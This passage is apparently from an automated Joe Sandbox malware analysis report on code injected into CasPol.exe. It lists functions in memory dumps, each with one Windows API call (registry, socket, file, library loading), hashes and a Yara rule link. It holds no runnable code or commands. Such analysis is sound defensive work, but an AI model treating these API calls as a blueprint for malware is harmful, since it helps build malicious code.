Opcode Fuzzy Hash: a89aaaf0d58953e403b7baea39df83f6be95ea2e73f24a6555aedb979c155c94
Instruction Fuzzy Hash: 4021B2715093806FE721CB25DC44F66FFB8EF46310F0884AEE9859F192C274A848CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0900 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF0995

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 99292fabf3cab93b0bb179e0c6cbc58e57f5dda975173954e9ce1bcd0c130cd3
Instruction ID: 0fadd0e4939cef507760bda74ed4ddfc8944077eebe87ebb986c8ccd21f90c84
Opcode Fuzzy Hash: 99292fabf3cab93b0bb179e0c6cbc58e57f5dda975173954e9ce1bcd0c130cd3
Instruction Fuzzy Hash: 5121F8B64097846FE712CB259C40BA2BFA8EF86720F0884DAE9D59F153D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA722 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D2AA7BE

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ec2123210e0e88b023c5838d5e17ee545da5b14dcb7f2035f6bb076f3df087e9
Instruction ID: e44e0389c39f779c0fbb3f5466184eb0e5fe9b5cdefb299f923988f02ca181cd
Opcode Fuzzy Hash: ec2123210e0e88b023c5838d5e17ee545da5b14dcb7f2035f6bb076f3df087e9
Instruction Fuzzy Hash: A521D6755093C06FD3138B259C51B62BFB4EF87A10F0981CBE8848F693D265691AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00EF082A Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00EF08A9

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a6e0ebffcaf8e45b89233dc61bb501bd7572d2f4d8de15e51b25e24246b6392
Instruction ID: fa36d2fd3f35989601030dfb67cc3e5ad6a837caf7d35d83ae829bff36d020c8
Opcode Fuzzy Hash: 8a6e0ebffcaf8e45b89233dc61bb501bd7572d2f4d8de15e51b25e24246b6392
Instruction Fuzzy Hash: DB219071600384AFE721DF69CD84B66FBE8EF04710F18846DEA859B652D375E804CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF01A4 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EA4), ref: 00EF023F

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 49b9e9f94084a9fb86b32911e3513b46b0a4f5ae5a1e44a02da37f88124ac8a4
Instruction ID: ceae09963e573972a4eee64075d5905bc726ed40cd8d302c1de8a1fc550feb10
Opcode Fuzzy Hash: 49b9e9f94084a9fb86b32911e3513b46b0a4f5ae5a1e44a02da37f88124ac8a4
Instruction Fuzzy Hash: 0721F8710053806FE7228B14CD85F62BFB8DF46720F1480DAF9859F193C2686949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA54A Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D2AA5C9

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 586e1786579bd4b6de5c52bb550833fa9c569a30a2b7c084aae7b5bf5e4638dc
Instruction ID: 741c765b4cbdc1f375622cc8b8aafee631c13c3dbc7795911be6caea8a965a13
Opcode Fuzzy Hash: 586e1786579bd4b6de5c52bb550833fa9c569a30a2b7c084aae7b5bf5e4638dc
Instruction Fuzzy Hash: DC21D172900204AEE7219F19CC85F6BFBECEF04720F04846AF9859B641D674E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF20C6 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 00EF213A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3c2270ff2ba9063b03b4a8cf3964b7c2d4a1c9f5e415f90354a3fbcf59a810f5
Instruction ID: 84e3ff455030a5b05676ca3f1aca2709642db673d061eabdf9160ea87343d8ae
Opcode Fuzzy Hash: 3c2270ff2ba9063b03b4a8cf3964b7c2d4a1c9f5e415f90354a3fbcf59a810f5
Instruction Fuzzy Hash: A921A172501204AFE7209F65DC85F7AFBA8EF44710F1484AAFE85AB241D374E9088AB5

Uniqueness

Uniqueness Score: -1.00%

Function 00EF40B6 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 00EF412A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 44cd547a54e8f2ade352d11e4e76f20899088d6d7d11d2f9f5b03994e4813c8c
Instruction ID: 5705e8cc4c29fd1034a45eb5e48d85b8006a21ef9cae3097f02743f08cfa68fa
Opcode Fuzzy Hash: 44cd547a54e8f2ade352d11e4e76f20899088d6d7d11d2f9f5b03994e4813c8c
Instruction Fuzzy Hash: 3221A1B2501204AFE720DF25DC45F7BFBA8EF54710F14846AEE45AB281D274A9488A71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0AB2 Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF0B31

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4b0e8055663045097ee4528887a4958516489f6681bb14b19c79caa6f24ea94b
Instruction ID: 10131dd6c9264c14a2e1a502b6859cbfdcbe6c805f9b6569bc9529160829bdd0
Opcode Fuzzy Hash: 4b0e8055663045097ee4528887a4958516489f6681bb14b19c79caa6f24ea94b
Instruction Fuzzy Hash: 2121D172405344AFEB228F55DC40FA7BFACEF45724F0484AAFA859B152C274A808CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1C06 Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1C8A

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 7786301409b7f503774604bd11fea3896fb1b73f7704073aba3cd1328113d02e
Instruction ID: ba743cf6b90a0e99932acb2040f540d284683647d621ee68001e84c849b5a89d
Opcode Fuzzy Hash: 7786301409b7f503774604bd11fea3896fb1b73f7704073aba3cd1328113d02e
Instruction Fuzzy Hash: B921A1724053846FD712CB15DD44FA7FBACEF45310F0884AAE9859B152D274A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF29B6 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF2A45

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: c4107319efa9f823d973e23884008d55d2b502fa9cd7c51ea7314620f3de408c
Instruction ID: fe732c84dd6fec5e64394cfa18926930f414fdf2892088b71880f1466fbbb725
Opcode Fuzzy Hash: c4107319efa9f823d973e23884008d55d2b502fa9cd7c51ea7314620f3de408c
Instruction Fuzzy Hash: 0D21C4710097846FDB228B119C84F66FFB8EF46310F0884DEE9849B193D365A908C772

Uniqueness

Uniqueness Score: -1.00%

Function 00EF16A6 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 00EF1719

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 679eece0a587691e2387843612045c923f49060053a3ab6ee8adc692a2ae7e7c
Instruction ID: 8da6381546c378fa589faa13b85c2fce5c73c9020d1d54b490f79b7209ef8ef5
Opcode Fuzzy Hash: 679eece0a587691e2387843612045c923f49060053a3ab6ee8adc692a2ae7e7c
Instruction Fuzzy Hash: 1E2192716042489FE720DF29CD85B66FBE8EF05714F1884AAEA49DB281D375E804CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00EF384A Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF38D2

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 3eeaffa17997798c90a1e95a82b25c2a25e966d57c84517b46c95d2b329337b6
Instruction ID: c141736503eb96de4dbed2a3d1e8f3f3fdd48b911cad49e99523549f2284ab7f
Opcode Fuzzy Hash: 3eeaffa17997798c90a1e95a82b25c2a25e966d57c84517b46c95d2b329337b6
Instruction Fuzzy Hash: A421AF71409384AFE7228B25DC44F66FFA8EF46714F0884AAE9849F152C3B5A508CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1A46 Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1AC1

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 9cd4043bd97414648bd39f6a9966c4ce24939aa19317303fefdaee0b50e5ce27
Instruction ID: 6a4444c1117f41a8de0b73ee0ead24b5a3ad57e3e5a3658a7cda6ac7a0b8344a
Opcode Fuzzy Hash: 9cd4043bd97414648bd39f6a9966c4ce24939aa19317303fefdaee0b50e5ce27
Instruction Fuzzy Hash: EB218971500A08AEEB218F15DC80FA6BBE8EF08710F0485AAEE859A251D274E844CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF253A Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF25C4

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 8a95e402d106d82d1e5116832d35aa61b0e0468f782c43d80a6bc1dbe0dba116
Instruction ID: d066221362b16a021868758dc5e41e932c90d2c588ee90bc1938b44f008d181a
Opcode Fuzzy Hash: 8a95e402d106d82d1e5116832d35aa61b0e0468f782c43d80a6bc1dbe0dba116
Instruction Fuzzy Hash: 4221B0714093846FE7128B159C44B66BFB8EF46720F0880DFE9849F193C268A948C772

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1CD4 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF1D63

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 67d13d068e51722e893aeafe65469cc70bced95e3bf0eb44196652f2a80884bb
Instruction ID: 1902d388f2d38f23ae1b7462916e0a94618ad2fde6c50cfa1b95ecbc9d7cb1a5
Opcode Fuzzy Hash: 67d13d068e51722e893aeafe65469cc70bced95e3bf0eb44196652f2a80884bb
Instruction Fuzzy Hash: 4121C2B14093846FE7228B25DC45F66FFB8EF42314F0984EEE9849B193D275A908C772

Uniqueness

Uniqueness Score: -1.00%

Function 00EF2A82 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00EF2B06

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: a5278934bd1ebe702e02d5c41c807c73aec62b97205960c0ac3026815973e74b
Instruction ID: db1a19c19cbfed7e3cda5a8cb17308b7466e2da4132286d1e2b4a5ac306691db
Opcode Fuzzy Hash: a5278934bd1ebe702e02d5c41c807c73aec62b97205960c0ac3026815973e74b
Instruction Fuzzy Hash: AB21AE754093849FDB228F60D844AA2BFB4EF06310F0984DEEA858F163D375A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF41C2 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF4234

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a7d36df090a204f955b89d036b6d68674632dd178649854ed42eedc4496535e3
Instruction ID: 16550ec9d355076c55d3bd2393798883b42306c4ef4e2162a41b88422c0ab689
Opcode Fuzzy Hash: a7d36df090a204f955b89d036b6d68674632dd178649854ed42eedc4496535e3
Instruction Fuzzy Hash: 33215EB1500204AEEB21CF55DD44FA7BBE8EF44710F14846AFE45EB2A1D774E948CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1947 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF19C3

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: daf98cbf5fe414d2ae6e8d02df564500cf83186961ce6d30954017b19fe5f023
Instruction ID: 80b82ddee68fa325061babe2c6a32ea52be457264ad9e4e107fe374053adc6ad
Opcode Fuzzy Hash: daf98cbf5fe414d2ae6e8d02df564500cf83186961ce6d30954017b19fe5f023
Instruction Fuzzy Hash: B521A172409384AFD722CF15DC84F66BFA8EF45710F0884AAE9899F192C274A508C772

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA652 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 1D2AA6CC

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 07ee820335ed29e6eb8e0b2922bb7b1aa98eea434fdbf955dd4f905be8dc77c5
Instruction ID: c250ecb1e37bcdac83343a5d638014fec0d26c88d9cc0f6f2d948272574f7638
Opcode Fuzzy Hash: 07ee820335ed29e6eb8e0b2922bb7b1aa98eea434fdbf955dd4f905be8dc77c5
Instruction Fuzzy Hash: AB21AE71600600AFEB20CF15CD84F67FBECEF04B10F14846AE9469B651D364E848CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1302 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 00EF136D

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: f97ad9a1e0e63c9bd04d4f147ae57a24598b73953425baae9338af395aaf3faf
Instruction ID: a99472906f86b4741a6382d1987dab912fc200276f77505849538475b92cc9be
Opcode Fuzzy Hash: f97ad9a1e0e63c9bd04d4f147ae57a24598b73953425baae9338af395aaf3faf
Instruction Fuzzy Hash: AC21C0B1505244AFE720DF29CD85B66FBE8EF04324F1884AAEE499B641D375F804CA76

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA309 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,AA0DAAB3), ref: 1D2AA378

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bd911e0d6dc4662d5fddfbfb52cba7e33bd41b01d15fdf8010fff781f8c6dea9
Instruction ID: 6a84ee24f2af93b71e5b3ca2b5a50f03358767447e68deef8137e892654dfa45
Opcode Fuzzy Hash: bd911e0d6dc4662d5fddfbfb52cba7e33bd41b01d15fdf8010fff781f8c6dea9
Instruction Fuzzy Hash: 312162715097C55FD7038B25DC55762BFB8EF42224F0980DBDD858F6A3D268A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF464A Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EF46C6

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 469377a865234bad3a25e51ba14bcae274efa204cf73f367431fe72426ac7633
Instruction ID: 5f609a8d5240e5b30e0b6004964995b7029dddab32ed63491067fe0bcd97acbe
Opcode Fuzzy Hash: 469377a865234bad3a25e51ba14bcae274efa204cf73f367431fe72426ac7633
Instruction Fuzzy Hash: 3D21AF764093809FDB228F61DC44A62BFB0EF07324F0984DAE9858F163D275A819DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1402 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00EF1476

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 8b80e54578f290a25eb37a445b35fdce4620da6304a5b5159911961bce5e52f3
Instruction ID: 092ef6619feb23413c602b43bafbbed79057a02dde549da1079361492945a643
Opcode Fuzzy Hash: 8b80e54578f290a25eb37a445b35fdce4620da6304a5b5159911961bce5e52f3
Instruction Fuzzy Hash: 6C21DE71500208AFE721CF19CD84FA6FBE8EF48320F04849EEA859B641D375B908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0D4A Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00EF0DB6

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: ec4f3accc13712a20c70b60221bec471b0b696dd80f0926b92b5d23470cf8e6e
Instruction ID: d85a79560c73958e6349802958b26a314cd6152d8ed1aac35d3732d75ec1c955
Opcode Fuzzy Hash: ec4f3accc13712a20c70b60221bec471b0b696dd80f0926b92b5d23470cf8e6e
Instruction Fuzzy Hash: B021C371504244AFEB21DF65DD44BA6FFE8EF04310F14846EEA859B652D376B404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AAE12 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 1D2AAE76

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: b26313f2f98b7c8e3a64d77d2fadecb534e31aed63628ab05b70e3cf48a85301
Instruction ID: eb8fa0f44493fc0236ca443937132b109179c1f365e468be0064db7c2d2cd104
Opcode Fuzzy Hash: b26313f2f98b7c8e3a64d77d2fadecb534e31aed63628ab05b70e3cf48a85301
Instruction Fuzzy Hash: 1A119D71600205AEE711CF15DD84F67BBA8EF44710F14C47AE959DB651D674E808CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1DD6 Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 00EF1E39

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 3359596a8582dd642e62420a69355139213069e6d68f8de4d909b6392d6bc9db
Instruction ID: 4ba48ab2a0e02c43b71921c63029b0e4111ea6c34c7119b65fee7bead48db020
Opcode Fuzzy Hash: 3359596a8582dd642e62420a69355139213069e6d68f8de4d909b6392d6bc9db
Instruction Fuzzy Hash: 0811B671500208AEF7209F59DD45F7AFB98EF44720F1484AAFE85AF241D674A9058A71

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA873 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D2AA8E2

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6fb25dc08975cfdc8e7c3ee30a4677be6507ad86e9d59e201c527455c8ca70b3
Instruction ID: 8c8a08a30d6321ed3d175b32f57600ae8350123425f21ea54be4524ec0e350d4
Opcode Fuzzy Hash: 6fb25dc08975cfdc8e7c3ee30a4677be6507ad86e9d59e201c527455c8ca70b3
Instruction Fuzzy Hash: 5B2160725093815FD712CF25DC44B63BFA8EF46610F1884AAED89DB652D265E808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1066 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF10D8

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f8360d80108e9a25e797c148ed237e4198b265f70f9ab73bc496a13a3676630e
Instruction ID: 9f7f8b0e968be63362e6242961fe288331a45c2bbe8a7b8dfa1e87ec3e6e71bd
Opcode Fuzzy Hash: f8360d80108e9a25e797c148ed237e4198b265f70f9ab73bc496a13a3676630e
Instruction Fuzzy Hash: FB118172600648AFE720CF15DD44FA6FBECEF44710F0485AAEA85AB651D774E848CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1FDA Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,AA0DAAB3,00000000,00000000,00000000,00000000), ref: 00EF2044

Memory Dump Source

Source File: 00000011.00000002.763183278.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ef0000_CasPol.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 4e5b9dbfc75a5ebba3aec1bb96b839ddfa74d7d0e5170893a5c6984279690715
Instruction ID: 4249673a35174f482a669d736437cd043302391fa50962df6c99810674bbb70c
Opcode Fuzzy Hash: 4e5b9dbfc75a5ebba3aec1bb96b839ddfa74d7d0e5170893a5c6984279690715
Instruction Fuzzy Hash: E211D372500204AEEB21CF55DD44FA7FBACEF44710F04846EEA85AB251D774A909CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AB58F Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D2AB612

Memory Dump Source

Source File: 00000011.00000002.774930640.000000001D2AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d2aa000_CasPol.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 4b1c4c9abc4b44ed7540c3e7eabc3c1c9ff44b410ae0658099af3422dc231c5b
Instruction ID: 6353c41173f59ea2f47efc7a8824dcadcbfc9d6deaaa0cf069305c1733d05163
